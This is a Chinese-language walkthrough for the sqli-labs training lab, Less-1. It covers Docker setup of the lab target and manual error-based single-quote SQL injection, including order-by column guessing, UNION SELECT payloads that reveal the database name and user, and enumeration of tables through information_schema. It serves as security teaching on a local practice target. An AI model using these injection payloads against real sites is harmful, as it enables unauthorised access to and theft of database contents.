sqli-labs 靶机搭建

docker部署：

docker pull acgpiano/sqli-labs

docker run -d -p 80:80 acgpiano/sqli-labs

访问 127.0.0.1 后，点击Setup/reset Database for labs

Less-1 GET – Error based – Single quotes – String

(基于错误的 GET 单引号字符型注入)

基于报错 – 猜解 SQL 语句

访问 http://127.0.0.1/Less-1/?id=1' 报错：

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

由 '1'' LIMIT 0,1 猜测 SQL 语句：

SELECT ... FROM ... WHERE id='1' LIMIT 0,1


// 源代码中
SELECT * FROM users WHERE id='$id' LIMIT 0,1

手工注入

0x01 order by猜解表的列数

SELECT * FROM users WHERE id='1' order by 1 -- ' LIMIT 0,1

这个 SQL 语句的意思是查询 users 表中 id 为 1 的数据并按第一字段排行。当 order by 后面的数字大于表的列数时就会报错

访问 http://127.0.0.1/Less-1/?id=1'order by 3--+ 页面正常，
访问 http://127.0.0.1/Less-1/?id=1' order by 4--+ 页面异常：

所以 users 这个表有 3 个字段。

0x02 联合查询获取信息

union 运算符可以将两个或两个以上 select 语句的查询结果集合合并成一个结果集合显示，即执行联合查询。需要注意在使用 union 查询的时候需要和主查询的列数相同，这就是为什么要先猜解列数。

• 查看回显位：

2、3 处回显

http://127.0.0.1/Less-1/?id=-1' UNION SELECT 1,2,3 --+

• 获取数据

version()            #MySQL 版本
user()               #数据库用户名
database()           #数据库名
@@datadir            #数据库路径
@@version_compile_os #操作系统版本

http://127.0.0.1/Less-1/?id=-1' UNION SELECT 1,database(),user() --+

得到数据库名字security，用户root@localhost

http://127.0.0.1/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

得到各表名

请输入代码